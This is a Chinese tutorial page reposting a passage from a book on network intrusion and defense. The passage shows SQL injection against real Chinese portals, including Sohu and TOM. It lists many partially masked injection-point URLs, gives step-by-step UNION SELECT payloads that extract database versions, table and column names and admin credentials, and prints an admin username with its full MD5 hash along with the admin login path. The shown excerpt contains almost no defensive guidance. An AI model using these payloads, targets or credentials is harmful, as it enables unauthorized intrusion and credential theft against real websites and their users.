来源:自学PHP网 时间:2015-04-17 15:08 作者: 阅读:次
[导读] 摘自:大中型网络入侵要案直击与防御电子工业出版社授权红黑联盟www.2cto.com发布可得到当前数据库用户名为admin,数据库服务器地址为10.10.82.159,数据库版本为Mysql 5.0.27,当前数据库名...
摘自:<大中型网络入侵要案直击与防御>电子工业出版社授权红黑联盟www.2cto.com发布 可得到当前数据库用户名为admin,数据库服务器地址为10.10.82.159,数据库版本为Mysql 5.0.27,当前数据库名为sohush。 再进一步检测,发现其中存在几个非常重要的数据库,包括:dvbbs、love008。前者是论坛数据库,后者是2008专题数据库。在论坛数据库中,可猜解出管理员账号和密码为:jim、4591b******ee2b5。在love008数据库中猜解出两个管理员用户和密码分别为(图2): admin 21232f297a*****743894a0e4a801fc3 es 3e4a632cb*****8fc2386fa5f8e4bd76 图2 猜解出管理员账号与密码 虽然说管理员密码都是MD5加密的,不过现在网上有20G的彩虹表下载,破解这些普通密码MD5值并不是太困难的事情。通过后台登陆,攻击者可以想方设法上传WebShell并进行提权与进一步渗透入侵操作。 此外,在搜狐网站中还有非常多的SQL注入点,举例如下: 注入点1(图3):http://card.money.****.com/yh/card_product.php?id=71 注入点2:http://blog.club.****.com/list_diary_detail.php?artid=43761&db=blog002P4&kindid=3403 注入点3:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529 注入点4:http://mini***.163.com/2009/0909/wuliangye/article.php?id=13 注入点5:http://blog.club.****.com/list_diary.php?db=blog001P3&kindid=529 注入点6:http://people.business.****.com/person/plist.php?userid=2047 注入点7:http://minisite.it.****.com/minisite/site849/photodetail1.jsp?corpID=849&status=browse&privCode=04&pictureID=57275 注入点8:http://zj.svip.****.com/news/2010/duanxindasai/item_list.php?category_id=1905 图3 搜狐注入点查询数据库信息 2.MySQL注入检测TOM门户网站 TOM也是国内一大门户网站,在对TOM门户网站进行检测的过程中,也发现了许多严重的SQL注入漏洞,而且危害性非常大,直接导致攻击者登陆后台上传木马获得WebShell,并进一步控制整个网站服务器! TOM网站的注入点地址为: http://qd**.tom.com/blog_content.php?blogid=482 直接用Order by进行查询时,会出错并跳转到网站首页,可使用--终止符号进行隔断处理,执行如下查询: http://qd**.tom.com/blog_content.php?blogid=482 order by 14-- 返回正常页面,得到字段数为14。再执行如下查询(图4): http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,group_concat(user(),0x7C7C,version(),0x7C7C,database()),4,5,6,7,8,9,10,11,12,13,14%20-- 图4 union联合查询获得数据库相关信息 得到当前数据库版本、数据库名和用户。再爆出当前数据库中的所有表名,提交如下查询: http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(table_name),5,6,7,8,9,10,11,12,13,14 from information_schema.tables where table_schema=database()-- 图5 查询到所有表名 在页面返回信息中,即可得到所有表名(图5)。在其中有名为adminuser的表名,表中很可能包含了管理员账号及密码,查询该表中的列名,可提交如下查询: http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name=(0x61646D696E75736572)-- 图6 返回用户名及密码数据列 从页面返回信息中,可以看到用户名及密码列为username和pw(图6)。现在要爆出用户名和密码的数据值,提交如下查询语句: http://qd**.tom.com/blog_content.php?blogid=482 and 1=2 union select 1,2,3,4,group_concat(username,0x7C,pw),5,6,7,8,9,10,11,12,13,14 from adminuser-- 图7 获得管理员账号密码信息 从返回的页面信息中,可看到管理员用户名为qdjxlq,密码为3631137b9b0e47608c4ece9decc9a607(图7)。密码是经过MD5加密的32密文,破解并不是很困难。得到后台管理员账号密码后,再寻找后台登陆地址,得到后台登陆链接地址为(图8): http://qd**.tom.com/admin/admin_login.php
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com